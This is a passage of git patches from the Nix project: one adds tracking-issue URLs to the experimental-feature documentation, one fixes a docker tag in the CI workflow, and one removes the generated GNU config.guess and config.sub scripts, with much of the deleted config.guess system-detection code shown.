               - dependencies in derivations on the outputs of
                 derivations that are themselves derivations outputs.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/39",
     },
     {
         .tag = Xp::ParseTomlTimestamps,
@@ -246,6 +262,7 @@ constexpr std::array xpFeatureDetails
         .description = R"(
             Allow parsing of timestamps in builtins.fromTOML.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/45",
     },
     {
         .tag = Xp::ReadOnlyLocalStore,
@@ -253,6 +270,7 @@ constexpr std::array xpFeatureDetails
         .description = R"(
             Allow the use of the `read-only` parameter in [local store](@docroot@/store/types/local-store.md) URIs.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/46",
     },
     {
         .tag = Xp::ConfigurableImpureEnv,
@@ -260,6 +278,7 @@ constexpr std::array xpFeatureDetails
         .description = R"(
             Allow the use of the [impure-env](@docroot@/command-ref/conf-file.md#conf-impure-env) setting.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/37",
     },
     {
         .tag = Xp::MountedSSHStore,
@@ -267,6 +286,7 @@ constexpr std::array xpFeatureDetails
         .description = R"(
             Allow the use of the [`mounted SSH store`](@docroot@/command-ref/new-cli/nix3-help-stores.html#experimental-ssh-store-with-filesytem-mounted).
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/43",
     },
     {
         .tag = Xp::VerifiedFetches,
@@ -274,6 +294,7 @@ constexpr std::array xpFeatureDetails
         .description = R"(
             Enables verification of git commit signatures through the [`fetchGit`](@docroot@/language/builtins.md#builtins-fetchGit) built-in.
         )",
+        .trackingUrl = "https://github.com/NixOS/nix/milestone/48",
     },
 }};
 
@@ -312,9 +333,12 @@ std::string_view showExperimentalFeature(const ExperimentalFeature tag)
 nlohmann::json documentExperimentalFeatures()
 {
     StringMap res;
-    for (auto & xpFeature : xpFeatureDetails)
-        res[std::string { xpFeature.name }] =
-            trim(stripIndentation(xpFeature.description));
+    for (auto & xpFeature : xpFeatureDetails) {
+        std::stringstream docOss;
+        docOss << stripIndentation(xpFeature.description);
+        docOss << fmt("\nRefer to [%1% tracking issue](%2%) for feature tracking.", xpFeature.name, xpFeature.trackingUrl);
+        res[std::string{xpFeature.name}] = trim(docOss.str());
+    }
     return (nlohmann::json) res;
 }
 

From 089d91ed4c298f4757ce61c558cc3b2604435ff0 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Sat, 2 Mar 2024 09:00:42 +0100
Subject: [PATCH 548/654] Fix the docker push job

After https://github.com/NixOS/nix/pull/10071, the CI was trying to push
ghcr.io/nixos/nix:master for backwards-compatibility, but the image was
not tagged as such, causing the job to fail.

Fix this.
---
 .github/workflows/ci.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 2aa3a3300..620a84b79 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -157,4 +157,5 @@ jobs:
         docker push $IMAGE_ID:$NIX_VERSION
         docker push $IMAGE_ID:latest
         # deprecated 2024-02-24
+        docker tag nix:$NIX_VERSION $IMAGE_ID:master
         docker push $IMAGE_ID:master

From f8dc9bc563c66c852452dd9a22c12c9bec35c309 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Sat, 2 Mar 2024 10:17:55 +0100
Subject: [PATCH 549/654] Remove and gitignore the autoreconf generated files

No need to have them checked-in since we require running `autoreconf`
when building, and these are regenerated by the `autoreconf` script.
---
 .gitignore          |    1 +
 config/config.guess | 1700 ---------------------------------------
 config/config.sub   | 1860 -------------------------------------------
 3 files changed, 1 insertion(+), 3560 deletions(-)
 delete mode 100755 config/config.guess
 delete mode 100755 config/config.sub

diff --git a/.gitignore b/.gitignore
index 5c1136823..7bf77adf4 100644
--- a/.gitignore
+++ b/.gitignore
@@ -10,6 +10,7 @@ perl/Makefile.config
 /stamp-h1
 /svn-revision
 /libtool
+/config/config.*
 
 # /doc/manual/
 /doc/manual/*.1
diff --git a/config/config.guess b/config/config.guess
deleted file mode 100755
index 1972fda8e..000000000
--- a/config/config.guess
+++ /dev/null
@@ -1,1700 +0,0 @@
-#! /bin/sh
-# Attempt to guess a canonical system name.
-#   Copyright 1992-2021 Free Software Foundation, Inc.
-
-timestamp='2021-01-25'
-
-# This file is free software; you can redistribute it and/or modify it
-# under the terms of the GNU General Public License as published by
-# the Free Software Foundation; either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, see .
-#
-# As a special exception to the GNU General Public License, if you
-# distribute this file as part of a program that contains a
-# configuration script generated by Autoconf, you may include it under
-# the same distribution terms that you use for the rest of that
-# program.  This Exception is an additional permission under section 7
-# of the GNU General Public License, version 3 ("GPLv3").
-#
-# Originally written by Per Bothner; maintained since 2000 by Ben Elliston.
-#
-# You can get the latest version of this script from:
-# https://git.savannah.gnu.org/cgit/config.git/plain/config.guess
-#
-# Please send patches to .
-
-
-me=$(echo "$0" | sed -e 's,.*/,,')
-
-usage="\
-Usage: $0 [OPTION]
-
-Output the configuration name of the system \`$me' is run on.
-
-Options:
-  -h, --help         print this help, then exit
-  -t, --time-stamp   print date of last modification, then exit
-  -v, --version      print version number, then exit
-
-Report bugs and patches to ."
-
-version="\
-GNU config.guess ($timestamp)
-
-Originally written by Per Bothner.
-Copyright 1992-2021 Free Software Foundation, Inc.
-
-This is free software; see the source for copying conditions.  There is NO
-warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE."
-
-help="
-Try \`$me --help' for more information."
-
-# Parse command line
-while test $# -gt 0 ; do
-  case $1 in
-    --time-stamp | --time* | -t )
-       echo "$timestamp" ; exit ;;
-    --version | -v )
-       echo "$version" ; exit ;;
-    --help | --h* | -h )
-       echo "$usage"; exit ;;
-    -- )     # Stop option processing
-       shift; break ;;
-    - )	# Use stdin as input.
-       break ;;
-    -* )
-       echo "$me: invalid option $1$help" >&2
-       exit 1 ;;
-    * )
-       break ;;
-  esac
-done
-
-if test $# != 0; then
-  echo "$me: too many arguments$help" >&2
-  exit 1
-fi
-
-# CC_FOR_BUILD -- compiler used by this script. Note that the use of a
-# compiler to aid in system detection is discouraged as it requires
-# temporary files to be created and, as you can see below, it is a
-# headache to deal with in a portable fashion.
-
-# Historically, `CC_FOR_BUILD' used to be named `HOST_CC'. We still
-# use `HOST_CC' if defined, but it is deprecated.
-
-# Portable tmp directory creation inspired by the Autoconf team.
-
-tmp=
-# shellcheck disable=SC2172
-trap 'test -z "$tmp" || rm -fr "$tmp"' 0 1 2 13 15
-
-set_cc_for_build() {
-    # prevent multiple calls if $tmp is already set
-    test "$tmp" && return 0
-    : "${TMPDIR=/tmp}"
-    # shellcheck disable=SC2039
-    { tmp=$( (umask 077 && mktemp -d "$TMPDIR/cgXXXXXX") 2>/dev/null) && test -n "$tmp" && test -d "$tmp" ; } ||
-	{ test -n "$RANDOM" && tmp=$TMPDIR/cg$$-$RANDOM && (umask 077 && mkdir "$tmp" 2>/dev/null) ; } ||
-	{ tmp=$TMPDIR/cg-$$ && (umask 077 && mkdir "$tmp" 2>/dev/null) && echo "Warning: creating insecure temp directory" >&2 ; } ||
-	{ echo "$me: cannot create a temporary directory in $TMPDIR" >&2 ; exit 1 ; }
-    dummy=$tmp/dummy
-    case ${CC_FOR_BUILD-},${HOST_CC-},${CC-} in
-	,,)    echo "int x;" > "$dummy.c"
-	       for driver in cc gcc c89 c99 ; do
-		   if ($driver -c -o "$dummy.o" "$dummy.c") >/dev/null 2>&1 ; then
-		       CC_FOR_BUILD="$driver"
-		       break
-		   fi
-	       done
-	       if test x"$CC_FOR_BUILD" = x ; then
-		   CC_FOR_BUILD=no_compiler_found
-	       fi
-	       ;;
-	,,*)   CC_FOR_BUILD=$CC ;;
-	,*,*)  CC_FOR_BUILD=$HOST_CC ;;
-    esac
-}
-
-# This is needed to find uname on a Pyramid OSx when run in the BSD universe.
-# (ghazi@noc.rutgers.edu 1994-08-24)
-if test -f /.attbin/uname ; then
-	PATH=$PATH:/.attbin ; export PATH
-fi
-
-UNAME_MACHINE=$( (uname -m) 2>/dev/null) || UNAME_MACHINE=unknown
-UNAME_RELEASE=$( (uname -r) 2>/dev/null) || UNAME_RELEASE=unknown
-UNAME_SYSTEM=$( (uname -s) 2>/dev/null) || UNAME_SYSTEM=unknown
-UNAME_VERSION=$( (uname -v) 2>/dev/null) || UNAME_VERSION=unknown
-
-case "$UNAME_SYSTEM" in
-Linux|GNU|GNU/*)
-	LIBC=unknown
-
-	set_cc_for_build
-	cat <<-EOF > "$dummy.c"
-	#include 
-	#if defined(__UCLIBC__)
-	LIBC=uclibc
-	#elif defined(__dietlibc__)
-	LIBC=dietlibc
-	#elif defined(__GLIBC__)
-	LIBC=gnu
-	#else
-	#include 
-	/* First heuristic to detect musl libc.  */
-	#ifdef __DEFINED_va_list
-	LIBC=musl
-	#endif
-	#endif
-	EOF
-	eval "$($CC_FOR_BUILD -E "$dummy.c" 2>/dev/null | grep '^LIBC' | sed 's, ,,g')"
-
-	# Second heuristic to detect musl libc.
-	if [ "$LIBC" = unknown ] &&
-	   command -v ldd >/dev/null &&
-	   ldd --version 2>&1 | grep -q ^musl; then
-		LIBC=musl
-	fi
-
-	# If the system lacks a compiler, then just pick glibc.
-	# We could probably try harder.
-	if [ "$LIBC" = unknown ]; then
-		LIBC=gnu
-	fi
-	;;
-esac
-
-# Note: order is significant - the case branches are not exclusive.
-
-case "$UNAME_MACHINE:$UNAME_SYSTEM:$UNAME_RELEASE:$UNAME_VERSION" in
-    *:NetBSD:*:*)
-	# NetBSD (nbsd) targets should (where applicable) match one or
-	# more of the tuples: *-*-netbsdelf*, *-*-netbsdaout*,
-	# *-*-netbsdecoff* and *-*-netbsd*.  For targets that recently
-	# switched to ELF, *-*-netbsd* would select the old
-	# object file format.  This provides both forward
-	# compatibility and a consistent mechanism for selecting the
-	# object file format.
-	#
-	# Note: NetBSD doesn't particularly care about the vendor
-	# portion of the name.  We always set it to "unknown".
-	UNAME_MACHINE_ARCH=$( (uname -p 2>/dev/null || \
-	    /sbin/sysctl -n hw.machine_arch 2>/dev/null || \
-	    /usr/sbin/sysctl -n hw.machine_arch 2>/dev/null || \
-	    echo unknown))
-	case "$UNAME_MACHINE_ARCH" in
-	    aarch64eb) machine=aarch64_be-unknown ;;
-	    armeb) machine=armeb-unknown ;;
-	    arm*) machine=arm-unknown ;;
-	    sh3el) machine=shl-unknown ;;
-	    sh3eb) machine=sh-unknown ;;
-	    sh5el) machine=sh5le-unknown ;;
-	    earmv*)
-		arch=$(echo "$UNAME_MACHINE_ARCH" | sed -e 's,^e\(armv[0-9]\).*$,\1,')
-		endian=$(echo "$UNAME_MACHINE_ARCH" | sed -ne 's,^.*\(eb\)$,\1,p')
-		machine="${arch}${endian}"-unknown
-		;;
-	    *) machine="$UNAME_MACHINE_ARCH"-unknown ;;
-	esac
-	# The Operating System including object format, if it has switched
-	# to ELF recently (or will in the future) and ABI.
-	case "$UNAME_MACHINE_ARCH" in
-	    earm*)
-		os=netbsdelf
-		;;
-	    arm*|i386|m68k|ns32k|sh3*|sparc|vax)
-		set_cc_for_build
-		if echo __ELF__ | $CC_FOR_BUILD -E - 2>/dev/null \
-			| grep -q __ELF__
-		then
-		    # Once all utilities can be ECOFF (netbsdecoff) or a.out (netbsdaout).
-		    # Return netbsd for either.  FIX?
-		    os=netbsd
-		else
-		    os=netbsdelf
-		fi
-		;;
-	    *)
-		os=netbsd
-		;;
-	esac
-	# Determine ABI tags.
-	case "$UNAME_MACHINE_ARCH" in
-	    earm*)
-		expr='s/^earmv[0-9]/-eabi/;s/eb$//'
-		abi=$(echo "$UNAME_MACHINE_ARCH" | sed -e "$expr")
-		;;
-	esac
-	# The OS release
-	# Debian GNU/NetBSD machines have a different userland, and
-	# thus, need a distinct triplet. However, they do not need
-	# kernel version information, so it can be replaced with a
-	# suitable tag, in the style of linux-gnu.
-	case "$UNAME_VERSION" in
-	    Debian*)
-		release='-gnu'
-		;;
-	    *)
-		release=$(echo "$UNAME_RELEASE" | sed -e 's/[-_].*//' | cut -d. -f1,2)
-		;;
-	esac
-	# Since CPU_TYPE-MANUFACTURER-KERNEL-OPERATING_SYSTEM:
-	# contains redundant information, the shorter form:
-	# CPU_TYPE-MANUFACTURER-OPERATING_SYSTEM is used.
-	echo "$machine-${os}${release}${abi-}"
-	exit ;;
-    *:Bitrig:*:*)
-	UNAME_MACHINE_ARCH=$(arch | sed 's/Bitrig.//')
-	echo "$UNAME_MACHINE_ARCH"-unknown-bitrig"$UNAME_RELEASE"
-	exit ;;
-    *:OpenBSD:*:*)
-	UNAME_MACHINE_ARCH=$(arch | sed 's/OpenBSD.//')
-	echo "$UNAME_MACHINE_ARCH"-unknown-openbsd"$UNAME_RELEASE"
-	exit ;;
-    *:LibertyBSD:*:*)
-	UNAME_MACHINE_ARCH=$(arch | sed 's/^.*BSD\.//')
-	echo "$UNAME_MACHINE_ARCH"-unknown-libertybsd"$UNAME_RELEASE"
-	exit ;;
-    *:MidnightBSD:*:*)
-	echo "$UNAME_MACHINE"-unknown-midnightbsd"$UNAME_RELEASE"
-	exit ;;
-    *:ekkoBSD:*:*)
-	echo "$UNAME_MACHINE"-unknown-ekkobsd"$UNAME_RELEASE"
-	exit ;;
-    *:SolidBSD:*:*)
-	echo "$UNAME_MACHINE"-unknown-solidbsd"$UNAME_RELEASE"
-	exit ;;
-    *:OS108:*:*)
-	echo "$UNAME_MACHINE"-unknown-os108_"$UNAME_RELEASE"
-	exit ;;
-    macppc:MirBSD:*:*)
-	echo powerpc-unknown-mirbsd"$UNAME_RELEASE"
-	exit ;;
-    *:MirBSD:*:*)
-	echo "$UNAME_MACHINE"-unknown-mirbsd"$UNAME_RELEASE"
-	exit ;;
-    *:Sortix:*:*)
-	echo "$UNAME_MACHINE"-unknown-sortix
-	exit ;;
-    *:Twizzler:*:*)
-	echo "$UNAME_MACHINE"-unknown-twizzler
-	exit ;;
-    *:Redox:*:*)
-	echo "$UNAME_MACHINE"-unknown-redox
-	exit ;;
-    mips:OSF1:*.*)
-	echo mips-dec-osf1
-	exit ;;
-    alpha:OSF1:*:*)
-	case $UNAME_RELEASE in
-	*4.0)
-		UNAME_RELEASE=$(/usr/sbin/sizer -v | awk '{print $3}')
-		;;
-	*5.*)
-		UNAME_RELEASE=$(/usr/sbin/sizer -v | awk '{print $4}')
-		;;
-	esac
-	# According to Compaq, /usr/sbin/psrinfo has been available on
-	# OSF/1 and Tru64 systems produced since 1995.  I hope that
-	# covers most systems running today.  This code pipes the CPU
-	# types through head -n 1, so we only detect the type of CPU 0.
-	ALPHA_CPU_TYPE=$(/usr/sbin/psrinfo -v | sed -n -e 's/^  The alpha \(.*\) processor.*$/\1/p' | head -n 1)
-	case "$ALPHA_CPU_TYPE" in
-	    "EV4 (21064)")
-		UNAME_MACHINE=alpha ;;
-	    "EV4.5 (21064)")
-		UNAME_MACHINE=alpha ;;
-	    "LCA4 (21066/21068)")
-		UNAME_MACHINE=alpha ;;
-	    "EV5 (21164)")
-		UNAME_MACHINE=alphaev5 ;;
-	    "EV5.6 (21164A)")
-		UNAME_MACHINE=alphaev56 ;;
-	    "EV5.6 (21164PC)")
-		UNAME_MACHINE=alphapca56 ;;
-	    "EV5.7 (21164PC)")
-		UNAME_MACHINE=alphapca57 ;;
-	    "EV6 (21264)")
-		UNAME_MACHINE=alphaev6 ;;
-	    "EV6.7 (21264A)")
-		UNAME_MACHINE=alphaev67 ;;
-	    "EV6.8CB (21264C)")
-		UNAME_MACHINE=alphaev68 ;;
-	    "EV6.8AL (21264B)")
-		UNAME_MACHINE=alphaev68 ;;
-	    "EV6.8CX (21264D)")
-		UNAME_MACHINE=alphaev68 ;;
-	    "EV6.9A (21264/EV69A)")
-		UNAME_MACHINE=alphaev69 ;;
-	    "EV7 (21364)")
-		UNAME_MACHINE=alphaev7 ;;
-	    "EV7.9 (21364A)")
-		UNAME_MACHINE=alphaev79 ;;
-	esac
-	# A Pn.n version is a patched version.
-	# A Vn.n version is a released version.
-	# A Tn.n version is a released field test version.
-	# A Xn.n version is an unreleased experimental baselevel.
-	# 1.2 uses "1.2" for uname -r.
-	echo "$UNAME_MACHINE"-dec-osf"$(echo "$UNAME_RELEASE" | sed -e 's/^[PVTX]//' | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz)"
-	# Reset EXIT trap before exiting to avoid spurious non-zero exit code.
-	exitcode=$?
-	trap '' 0
-	exit $exitcode ;;
-    Amiga*:UNIX_System_V:4.0:*)
-	echo m68k-unknown-sysv4
-	exit ;;
-    *:[Aa]miga[Oo][Ss]:*:*)
-	echo "$UNAME_MACHINE"-unknown-amigaos
-	exit ;;
-    *:[Mm]orph[Oo][Ss]:*:*)
-	echo "$UNAME_MACHINE"-unknown-morphos
-	exit ;;
-    *:OS/390:*:*)
-	echo i370-ibm-openedition
-	exit ;;
-    *:z/VM:*:*)
-	echo s390-ibm-zvmoe
-	exit ;;
-    *:OS400:*:*)
-	echo powerpc-ibm-os400
-	exit ;;
-    arm:RISC*:1.[012]*:*|arm:riscix:1.[012]*:*)
-	echo arm-acorn-riscix"$UNAME_RELEASE"
-	exit ;;
-    arm*:riscos:*:*|arm*:RISCOS:*:*)
-	echo arm-unknown-riscos
-	exit ;;
-    SR2?01:HI-UX/MPP:*:* | SR8000:HI-UX/MPP:*:*)
-	echo hppa1.1-hitachi-hiuxmpp
-	exit ;;
-    Pyramid*:OSx*:*:* | MIS*:OSx*:*:* | MIS*:SMP_DC-OSx*:*:*)
-	# akee@wpdis03.wpafb.af.mil (Earle F. Ake) contributed MIS and NILE.
-	if test "$( (/bin/universe) 2>/dev/null)" = att ; then
-		echo pyramid-pyramid-sysv3
-	else
-		echo pyramid-pyramid-bsd
-	fi
-	exit ;;
-    NILE*:*:*:dcosx)
-	echo pyramid-pyramid-svr4
-	exit ;;
-    DRS?6000:unix:4.0:6*)
-	echo sparc-icl-nx6
-	exit ;;
-    DRS?6000:UNIX_SV:4.2*:7* | DRS?6000:isis:4.2*:7*)
-	case $(/usr/bin/uname -p) in
-	    sparc) echo sparc-icl-nx7; exit ;;
-	esac ;;
-    s390x:SunOS:*:*)
-	echo "$UNAME_MACHINE"-ibm-solaris2"$(echo "$UNAME_RELEASE" | sed -e 's/[^.]*//')"
-	exit ;;
-    sun4H:SunOS:5.*:*)
-	echo sparc-hal-solaris2"$(echo "$UNAME_RELEASE"|sed -e 's/[^.]*//')"
-	exit ;;
-    sun4*:SunOS:5.*:* | tadpole*:SunOS:5.*:*)
-	echo sparc-sun-solaris2"$(echo "$UNAME_RELEASE" | sed -e 's/[^.]*//')"
-	exit ;;
-    i86pc:AuroraUX:5.*:* | i86xen:AuroraUX:5.*:*)
-	echo i386-pc-auroraux"$UNAME_RELEASE"
-	exit ;;
-    i86pc:SunOS:5.*:* | i86xen:SunOS:5.*:*)
-	set_cc_for_build
-	SUN_ARCH=i386
-	# If there is a compiler, see if it is configured for 64-bit objects.
-	# Note that the Sun cc does not turn __LP64__ into 1 like gcc does.
-	# This test works for both compilers.
-	if test "$CC_FOR_BUILD" != no_compiler_found; then
-	    if (echo '#ifdef __amd64'; echo IS_64BIT_ARCH; echo '#endif') | \
-		(CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) | \
-		grep IS_64BIT_ARCH >/dev/null
-	    then
-		SUN_ARCH=x86_64
-	    fi
-	fi
-	echo "$SUN_ARCH"-pc-solaris2"$(echo "$UNAME_RELEASE"|sed -e 's/[^.]*//')"
-	exit ;;
-    sun4*:SunOS:6*:*)
-	# According to config.sub, this is the proper way to canonicalize
-	# SunOS6.  Hard to guess exactly what SunOS6 will be like, but
-	# it's likely to be more like Solaris than SunOS4.
-	echo sparc-sun-solaris3"$(echo "$UNAME_RELEASE"|sed -e 's/[^.]*//')"
-	exit ;;
-    sun4*:SunOS:*:*)
-	case "$(/usr/bin/arch -k)" in
-	    Series*|S4*)
-		UNAME_RELEASE=$(uname -v)
-		;;
-	esac
-	# Japanese Language versions have a version number like `4.1.3-JL'.
-	echo sparc-sun-sunos"$(echo "$UNAME_RELEASE"|sed -e 's/-/_/')"
-	exit ;;
-    sun3*:SunOS:*:*)
-	echo m68k-sun-sunos"$UNAME_RELEASE"
-	exit ;;
-    sun*:*:4.2BSD:*)
-	UNAME_RELEASE=$( (sed 1q /etc/motd | awk '{print substr($5,1,3)}') 2>/dev/null)
-	test "x$UNAME_RELEASE" = x && UNAME_RELEASE=3
-	case "$(/bin/arch)" in
-	    sun3)
-		echo m68k-sun-sunos"$UNAME_RELEASE"
-		;;
-	    sun4)
-		echo sparc-sun-sunos"$UNAME_RELEASE"
-		;;
-	esac
-	exit ;;
-    aushp:SunOS:*:*)
-	echo sparc-auspex-sunos"$UNAME_RELEASE"
-	exit ;;
-    # The situation for MiNT is a little confusing.  The machine name
-    # can be virtually everything (everything which is not
-    # "atarist" or "atariste" at least should have a processor
-    # > m68000).  The system name ranges from "MiNT" over "FreeMiNT"
-    # to the lowercase version "mint" (or "freemint").  Finally
-    # the system name "TOS" denotes a system which is actually not
-    # MiNT.  But MiNT is downward compatible to TOS, so this should
-    # be no problem.
-    atarist[e]:*MiNT:*:* | atarist[e]:*mint:*:* | atarist[e]:*TOS:*:*)
-	echo m68k-atari-mint"$UNAME_RELEASE"
-	exit ;;
-    atari*:*MiNT:*:* | atari*:*mint:*:* | atarist[e]:*TOS:*:*)
-	echo m68k-atari-mint"$UNAME_RELEASE"
-	exit ;;
-    *falcon*:*MiNT:*:* | *falcon*:*mint:*:* | *falcon*:*TOS:*:*)
-	echo m68k-atari-mint"$UNAME_RELEASE"
-	exit ;;
-    milan*:*MiNT:*:* | milan*:*mint:*:* | *milan*:*TOS:*:*)
-	echo m68k-milan-mint"$UNAME_RELEASE"
-	exit ;;
-    hades*:*MiNT:*:* | hades*:*mint:*:* | *hades*:*TOS:*:*)
-	echo m68k-hades-mint"$UNAME_RELEASE"
-	exit ;;
-    *:*MiNT:*:* | *:*mint:*:* | *:*TOS:*:*)
-	echo m68k-unknown-mint"$UNAME_RELEASE"
-	exit ;;
-    m68k:machten:*:*)
-	echo m68k-apple-machten"$UNAME_RELEASE"
-	exit ;;
-    powerpc:machten:*:*)
-	echo powerpc-apple-machten"$UNAME_RELEASE"
-	exit ;;
-    RISC*:Mach:*:*)
-	echo mips-dec-mach_bsd4.3
-	exit ;;
-    RISC*:ULTRIX:*:*)
-	echo mips-dec-ultrix"$UNAME_RELEASE"
-	exit ;;
-    VAX*:ULTRIX*:*:*)
-	echo vax-dec-ultrix"$UNAME_RELEASE"
-	exit ;;
-    2020:CLIX:*:* | 2430:CLIX:*:*)
-	echo clipper-intergraph-clix"$UNAME_RELEASE"
-	exit ;;
-    mips:*:*:UMIPS | mips:*:*:RISCos)
-	set_cc_for_build
-	sed 's/^	//' << EOF > "$dummy.c"
-#ifdef __cplusplus
-#include   /* for printf() prototype */
-	int main (int argc, char *argv[]) {
-#else
-	int main (argc, argv) int argc; char *argv[]; {
-#endif
-	#if defined (host_mips) && defined (MIPSEB)
-	#if defined (SYSTYPE_SYSV)
-	  printf ("mips-mips-riscos%ssysv\\n", argv[1]); exit (0);
-	#endif
-	#if defined (SYSTYPE_SVR4)
-	  printf ("mips-mips-riscos%ssvr4\\n", argv[1]); exit (0);
-	#endif
-	#if defined (SYSTYPE_BSD43) || defined(SYSTYPE_BSD)
-	  printf ("mips-mips-riscos%sbsd\\n", argv[1]); exit (0);
-	#endif
-	#endif
-	  exit (-1);
-	}
-EOF
-	$CC_FOR_BUILD -o "$dummy" "$dummy.c" &&
-	  dummyarg=$(echo "$UNAME_RELEASE" | sed -n 's/\([0-9]*\).*/\1/p') &&
-	  SYSTEM_NAME=$("$dummy" "$dummyarg") &&
-	    { echo "$SYSTEM_NAME"; exit; }
-	echo mips-mips-riscos"$UNAME_RELEASE"
-	exit ;;
-    Motorola:PowerMAX_OS:*:*)
-	echo powerpc-motorola-powermax
-	exit ;;
-    Motorola:*:4.3:PL8-*)
-	echo powerpc-harris-powermax
-	exit ;;
-    Night_Hawk:*:*:PowerMAX_OS | Synergy:PowerMAX_OS:*:*)
-	echo powerpc-harris-powermax
-	exit ;;
-    Night_Hawk:Power_UNIX:*:*)
-	echo powerpc-harris-powerunix
-	exit ;;
-    m88k:CX/UX:7*:*)
-	echo m88k-harris-cxux7
-	exit ;;
-    m88k:*:4*:R4*)
-	echo m88k-motorola-sysv4
-	exit ;;
-    m88k:*:3*:R3*)
-	echo m88k-motorola-sysv3
-	exit ;;
-    AViiON:dgux:*:*)
-	# DG/UX returns AViiON for all architectures
-	UNAME_PROCESSOR=$(/usr/bin/uname -p)
-	if test "$UNAME_PROCESSOR" = mc88100 || test "$UNAME_PROCESSOR" = mc88110
-	then
-	    if test "$TARGET_BINARY_INTERFACE"x = m88kdguxelfx || \
-	       test "$TARGET_BINARY_INTERFACE"x = x
-	    then
-		echo m88k-dg-dgux"$UNAME_RELEASE"
-	    else
-		echo m88k-dg-dguxbcs"$UNAME_RELEASE"
-	    fi
-	else
-	    echo i586-dg-dgux"$UNAME_RELEASE"
-	fi
-	exit ;;
-    M88*:DolphinOS:*:*)	# DolphinOS (SVR3)
-	echo m88k-dolphin-sysv3
-	exit ;;
-    M88*:*:R3*:*)
-	# Delta 88k system running SVR3
-	echo m88k-motorola-sysv3
-	exit ;;
-    XD88*:*:*:*) # Tektronix XD88 system running UTekV (SVR3)
-	echo m88k-tektronix-sysv3
-	exit ;;
-    Tek43[0-9][0-9]:UTek:*:*) # Tektronix 4300 system running UTek (BSD)
-	echo m68k-tektronix-bsd
-	exit ;;
-    *:IRIX*:*:*)
-	echo mips-sgi-irix"$(echo "$UNAME_RELEASE"|sed -e 's/-/_/g')"
-	exit ;;
-    ????????:AIX?:[12].1:2)   # AIX 2.2.1 or AIX 2.1.1 is RT/PC AIX.
-	echo romp-ibm-aix     # uname -m gives an 8 hex-code CPU id
-	exit ;;               # Note that: echo "'$(uname -s)'" gives 'AIX '
-    i*86:AIX:*:*)
-	echo i386-ibm-aix
-	exit ;;
-    ia64:AIX:*:*)
-	if test -x /usr/bin/oslevel ; then
-		IBM_REV=$(/usr/bin/oslevel)
-	else
-		IBM_REV="$UNAME_VERSION.$UNAME_RELEASE"
-	fi
-	echo "$UNAME_MACHINE"-ibm-aix"$IBM_REV"
-	exit ;;
-    *:AIX:2:3)
-	if grep bos325 /usr/include/stdio.h >/dev/null 2>&1; then
-		set_cc_for_build
-		sed 's/^		//' << EOF > "$dummy.c"
-		#include 
-
-		main()
-			{
-			if (!__power_pc())
-				exit(1);
-			puts("powerpc-ibm-aix3.2.5");
-			exit(0);
-			}
-EOF
-		if $CC_FOR_BUILD -o "$dummy" "$dummy.c" && SYSTEM_NAME=$("$dummy")
-		then
-			echo "$SYSTEM_NAME"
-		else
-			echo rs6000-ibm-aix3.2.5
-		fi
-	elif grep bos324 /usr/include/stdio.h >/dev/null 2>&1; then
-		echo rs6000-ibm-aix3.2.4
-	else
-		echo rs6000-ibm-aix3.2
-	fi
-	exit ;;
-    *:AIX:*:[4567])
-	IBM_CPU_ID=$(/usr/sbin/lsdev -C -c processor -S available | sed 1q | awk '{ print $1 }')
-	if /usr/sbin/lsattr -El "$IBM_CPU_ID" | grep ' POWER' >/dev/null 2>&1; then
-		IBM_ARCH=rs6000
-	else
-		IBM_ARCH=powerpc
-	fi
-	if test -x /usr/bin/lslpp ; then
-		IBM_REV=$(/usr/bin/lslpp -Lqc bos.rte.libc |
-			   awk -F: '{ print $3 }' | sed s/[0-9]*$/0/)
-	else
-		IBM_REV="$UNAME_VERSION.$UNAME_RELEASE"
-	fi
-	echo "$IBM_ARCH"-ibm-aix"$IBM_REV"
-	exit ;;
-    *:AIX:*:*)
-	echo rs6000-ibm-aix
-	exit ;;
-    ibmrt:4.4BSD:*|romp-ibm:4.4BSD:*)
-	echo romp-ibm-bsd4.4
-	exit ;;
-    ibmrt:*BSD:*|romp-ibm:BSD:*)            # covers RT/PC BSD and
-	echo romp-ibm-bsd"$UNAME_RELEASE"   # 4.3 with uname added to
-	exit ;;                             # report: romp-ibm BSD 4.3
-    *:BOSX:*:*)
-	echo rs6000-bull-bosx
-	exit ;;
-    DPX/2?00:B.O.S.:*:*)
-	echo m68k-bull-sysv3
-	exit ;;
-    9000/[34]??:4.3bsd:1.*:*)
-	echo m68k-hp-bsd
-	exit ;;
-    hp300:4.4BSD:*:* | 9000/[34]??:4.3bsd:2.*:*)
-	echo m68k-hp-bsd4.4
-	exit ;;
-    9000/[34678]??:HP-UX:*:*)
-	HPUX_REV=$(echo "$UNAME_RELEASE"|sed -e 's/[^.]*.[0B]*//')
-	case "$UNAME_MACHINE" in
-	    9000/31?)            HP_ARCH=m68000 ;;
-	    9000/[34]??)         HP_ARCH=m68k ;;
-	    9000/[678][0-9][0-9])
-		if test -x /usr/bin/getconf; then
-		    sc_cpu_version=$(/usr/bin/getconf SC_CPU_VERSION 2>/dev/null)
-		    sc_kernel_bits=$(/usr/bin/getconf SC_KERNEL_BITS 2>/dev/null)
-		    case "$sc_cpu_version" in
-		      523) HP_ARCH=hppa1.0 ;; # CPU_PA_RISC1_0
-		      528) HP_ARCH=hppa1.1 ;; # CPU_PA_RISC1_1
-		      532)                      # CPU_PA_RISC2_0
-			case "$sc_kernel_bits" in
